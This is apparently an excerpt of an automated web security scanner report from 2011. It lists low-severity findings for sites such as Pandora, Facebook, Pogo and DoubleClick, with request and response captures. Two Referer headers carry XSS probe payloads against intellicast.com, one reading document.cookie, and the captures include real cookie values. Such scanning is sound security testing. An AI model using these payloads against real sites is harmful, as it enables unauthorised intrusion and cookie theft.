http://diythemes.com/thesis/
http://themeforest.net/user/freshface/portfolio
http://www.cmsinter.net/
http://www.pandora.com/static/ads/media-kit/advertising.html

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

14.1. http://blog.pandora.com/pandora/archives/2007/07/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/07/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
bn
add

Request

GET /pandora/archives/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:03 GMT
ETag: "7cc51b-9333-498819d3bfcc0"
Accept-Ranges: bytes
Content-Length: 37683
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<div align="center"><form method="post" action="https://www.paypal.com/cgi-bin/webscr" target="paypal"> <input type="hidden" name="cmd" value="_xclick">
...[SNIP]...

14.2. http://diythemes.com/thesis/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://diythemes.com
Path:	/thesis/

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

email
meta_web_form_id
meta_split_id
listname
redirect
meta_adtracking
meta_message
meta_required
meta_tooltip
submit

Request

GET /thesis/ HTTP/1.1
Host: diythemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.3. http://themeforest.net/user/freshface/portfolio previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://themeforest.net
Path:	/user/freshface/portfolio

Issue detail

The page contains a form which POSTs data to the domain envato.us1.list-manage.com. The form contains the following fields:

FNAME
LNAME
EMAIL
subscribe

Request

GET /user/freshface/portfolio HTTP/1.1
Host: themeforest.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 09 Jan 2011 02:28:47 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "7d3f05bdfbd104cc41cd574e20733696"
X-Runtime: 174
Content-Length: 34838
Set-Cookie: referring_user=-1; domain=.themeforest.net; path=/; expires=Sat, 09-Apr-2011 03:28:47 GMT
Set-Cookie: _fd_session=BAh7BzoUcG9zdF9zaWduaW5fdXJsIjRodHRwOi8vdGhlbWVmb3Jlc3QubmV0L3VzZXIvZnJlc2hmYWNlL3BvcnRmb2xpbzoPc2Vzc2lvbl9pZCIlMjE0MjRhNzMxMWQ0MzcxMGU2YzU3ODY1MDNjM2EzOGQ%3D--d7f2ff8f0d287190348429cb42e2ca4e35b99358; path=/; expires=Tue, 08-Jan-2013 14:28:47 GMT; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="h
...[SNIP]...
</h3>
<form action="http://Envato.us1.list-manage.com/subscribe/post?u=01a7104df9f31fd41e34ccbed&id=6f890803c2" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank">
<input type="text" value="First Name" name="FNAME" id="mce-FNAME" class="fname" />
...[SNIP]...

14.4. http://www.cmsinter.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cmsinter.net
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

url
title
loc
email

Request

GET / HTTP/1.1
Host: www.cmsinter.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 08 Jan 2011 22:46:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.cmsinter.net/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 24765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:/
...[SNIP]...
<div id="rss-wrapper">
<form id="subcribe-form" class="simple-form" action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<div>
...[SNIP]...

14.5. http://www.pandora.com/static/ads/media-kit/advertising.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/static/ads/media-kit/advertising.html

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

oid
retURL
first_name
last_name
company
email
phone
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
zip
interest
interest
interest
budget
budget
budget
budget
budget
submit

Request

GET /static/ads/media-kit/advertising.html HTTP/1.1
Host: www.pandora.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/login.vm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.9.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:36:26 GMT
Server: Apache
Last-Modified: Fri, 07 Jan 2011 18:35:25 GMT
ETag: "365d-49945e1af5540"
Accept-Ranges: bytes
Content-Length: 13917
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content
...[SNIP]...
</script>

<form method="POST" id="form1" name="form1" style="font-family:Arial,Helvetica,san-serif;font-size:15px;font-weight:bold;margin-top:12px" onsubmit="return checkForm(this)" action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" optify_submit="true">

<input type=hidden name="oid" value="00D300000001WOu">
...[SNIP]...

15. SSL cookie without secure flag set previous next
There are 2 instances of this issue:

https://www.facebook.com/login.php
https://www.pogo.com/fbconnect/js.do

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

15.1. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly
lsd=tJ98F; path=/; domain=.facebook.com
reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:27:42 GMT
Content-Length: 16799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

15.2. https://www.pogo.com/fbconnect/js.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/fbconnect/js.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

prod.JID=C0E6107E9294EBED951A4EC6E886F7B9.000257; Domain=.pogo.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16. Cross-domain Referer leakage previous next
There are 83 instances of this issue:

http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2
http://ad.doubleclick.net/adi/N3285.weather/B2343920.105
http://ad.doubleclick.net/adi/N3285.weather/B2343920.98
http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144
http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144
http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144
http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13
http://ad.doubleclick.net/adj/home.pogo/spotlight
http://ad.doubleclick.net/adj/home.pogo/spotlight
http://ad.doubleclick.net/adj/ic.us.wx/fcst
http://ad.doubleclick.net/adj/pand.default/prod.backstage
http://admeld.adnxs.com/usersync
http://ads.bluelithium.com/st
http://board-games.pogo.com/games/monopoly
http://download-games.pogo.com/
http://download-games.pogo.com/
http://download-games.pogo.com/AllGames.aspx
http://download-games.pogo.com/AllGames.aspx
http://download-games.pogo.com/Category.aspx
http://download-games.pogo.com/Category.aspx
http://download-games.pogo.com/deluxe.aspx
http://download-games.pogo.com/deluxe.aspx
http://download-games.pogo.com/deluxe.aspx
http://download-games.pogo.com/downloads.aspx
http://game3.pogo.com/error/java-problem.jsp
http://game3.pogo.com/exhibit/game/game.jsp
http://game3.pogo.com/exhibit/intermission.jsp
http://game3.pogo.com/exhibit/loading/loading.jsp
http://game3.pogo.com/exhibit/loading/loading.jsp
http://jqueryui.com/themeroller/
http://word-games.pogo.com/
http://word-games.pogo.com/games/scrabble
http://www.adbrite.com/mb/commerce/purchase_form.php
http://www.adobe.com/cfusion/marketplace/index.cfm
http://www.cmsinter.net/
http://www.cmsinter.net/
http://www.cmsinter.net/blog/
http://www.e00.peanutlabs.com/js/iFrame/sc.php
http://www.facebook.com/
http://www.facebook.com/Pogo
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/like.php
http://www.intellicast.com/Local/Weather.aspx
http://www.pandora.com/
http://www.pandora.com/login.vm
http://www.peanutlabs.com/js/iFrame/sc.php
http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php
http://www.pogo.com/
http://www.pogo.com/
http://www.pogo.com/all-games
http://www.pogo.com/arcade-sports-games
http://www.pogo.com/board-games
http://www.pogo.com/club-pogo
http://www.pogo.com/games/scrabble
http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp
http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp
http://www.pogo.com/misc/advertise.jsp
http://www.pogo.com/oberon/navheader.jsp
http://www.pogo.com/oberon/navheader.jsp
http://www.pogo.com/prize/prize.do
http://www.pogo.com/sitemap
http://www.pogo.com/word-games
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/surveys/surveysofferssubs.do
http://www.slidedeck.com/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

16.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.Centro/B5116224.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=nZnxtZnfJ0ep4aw4SJtUcZaK970XTM5V+hGQOrWjLVusxj9NBnTZe7HiRIyQkK+Lf709p72o0c2MbNEBkfky9CbLzI74l0oevic3myW8gcI=!;ord=1518980345?

The response contains the following links to other domains:

http://s0.2mdn.net/2981993/300x250_4GBeacon.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N2998.Centro/B5116224.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=nZnxtZnfJ0ep4aw4SJtUcZaK970XTM5V+hGQOrWjLVusxj9NBnTZe7HiRIyQkK+Lf709p72o0c2MbNEBkfky9CbLzI74l0oevic3myW8gcI=!;ord=1518980345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mlive.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 09 Jan 2011 01:48:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5703

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
%3fhttp://ad.afy11.net/ad?c=nZnxtZnfJ0ep4aw4SJtUcZaK970XTM5V+hGQOrWjLVusxj9NBnTZe7HiRIyQkK+Lf709p72o0c2MbNEBkfky9CbLzI74l0oevic3myW8gcI=!http%3a%2f%2fnetwork4g.verizonwireless.com%3Fcid%3DBAC-brnrsch"><img src="http://s0.2mdn.net/2981993/300x250_4GBeacon.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

16.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.weather/B2343920.105

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3285.weather/B2343920.105;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B234424098%3B0-0%3B1%3B51429741%3B4307-300/250%3B36377512/36395392/1%3Bu%3Dord-15946109888357728256%2Atile-10%3B~aopt%3D6/1/ff/1%3B~sscs%3D%3f;ord=4463918?

The response contains the following links to other domains:

http://s0.2mdn.net/1420759/lmb_lre_PassAgeOldPaperCNPBelow15s40k_RateHit299_729Fed_1210_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3285.weather/B2343920.105;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B234424098%3B0-0%3B1%3B51429741%3B4307-300/250%3B36377512/36395392/1%3Bu%3Dord-15946109888357728256%2Atile-10%3B~aopt%3D6/1/ff/1%3B~sscs%3D%3f;ord=4463918? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.intellicast.com/Local/Weather.aspx?location=USMI0020&54ef9%22style%3d%22x%3aexpression(alert(1))%2223d5246f6f3=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 09 Jan 2011 01:46:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4457

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
250%3B36377512/36395392/1%3Bu%3Dord-15946109888357728256%2Atile-10%3B~aopt%3D6/1/ff/1%3B~sscs%3D%3fhttps://www.lowermybills.com/lending/home-refinance/?sourceid=39476784-228696663-39894232&moid=20496"><img src="http://s0.2mdn.net/1420759/lmb_lre_PassAgeOldPaperCNPBelow15s40k_RateHit299_729Fed_1210_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

16.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.weather/B2343920.98

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3285.weather/B2343920.98;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/o%3B234424028%3B0-0%3B1%3B51429741%3B4307-300/250%3B36375510/36393390/1%3Bu%3Dord-15834307958312271872%2Atile-10%3B~aopt%3D6/1/ff/1%3B~sscs%3D%3f;ord=4446777?

The response contains the following links to other domains:

http://s0.2mdn.net/1420759/lmb_lre_PassAgeOldPaperCNP15s40k_FedCollapse_729Fed_1210_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3285.weather/B2343920.98;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/o%3B234424028%3B0-0%3B1%3B51429741%3B4307-300/250%3B36375510/36393390/1%3Bu%3Dord-15834307958312271872%2Atile-10%3B~aopt%3D6/1/ff/1%3B~sscs%3D%3f;ord=4446777? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.intellicast.com/Local/Weather.aspx?location=USMI0020&54ef9%22style%3d%22x%3aexpression(alert(document.cookie))%2223d5246f6f3=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 09 Jan 2011 01:46:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4423

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3B4307-300/250%3B36375510/36393390/1%3Bu%3Dord-15834307958312271872%2Atile-10%3B~aopt%3D6/1/ff/1%3B~sscs%3D%3fhttps://www.lowermybills.com/lending/home-refinance/?sourceid=38565174-228687296-39941078"><img src="http://s0.2mdn.net/1420759/lmb_lre_PassAgeOldPaperCNP15s40k_FedCollapse_729Fed_1210_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

16.4. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5621.148484.0233710364621/B4682144

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=;ord=183717264?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2070351/41-728x90.jpg

Request

GET /adi/N5621.148484.0233710364621/B4682144;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=;ord=183717264? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 732
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 09 Jan 2011 02:01:27 GMT
Expires: Sun, 09 Jan 2011 02:01:27 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a8a/4/a7/%2a/a
...[SNIP]...
--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_3a&mnc=1431&kw=Battle%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Battle%20NFHC&utm_content=GDBSO_3a&utm_campaign=GDBS-O"><img src="http://s0.2mdn.net/viewad/2070351/41-728x90.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

16.5. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5621.148484.0233710364621/B4682144

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUglbYKSBD_L9FJRli_rGOTxdZ_XJnZW8sdXNhLHQsMTI5NDUzNjE3NTE1OCxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNS1BMCxsLDUxODExCg--/clkurl=;ord=324520354?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2070351/46-728x90.jpg

Request

GET /adi/N5621.148484.0233710364621/B4682144;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUglbYKSBD_L9FJRli_rGOTxdZ_XJnZW8sdXNhLHQsMTI5NDUzNjE3NTE1OCxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNS1BMCxsLDUxODExCg--/clkurl=;ord=324520354? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536160339719001&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 09 Jan 2011 01:22:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 798

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a8a/4/a7/%2a/f
...[SNIP]...
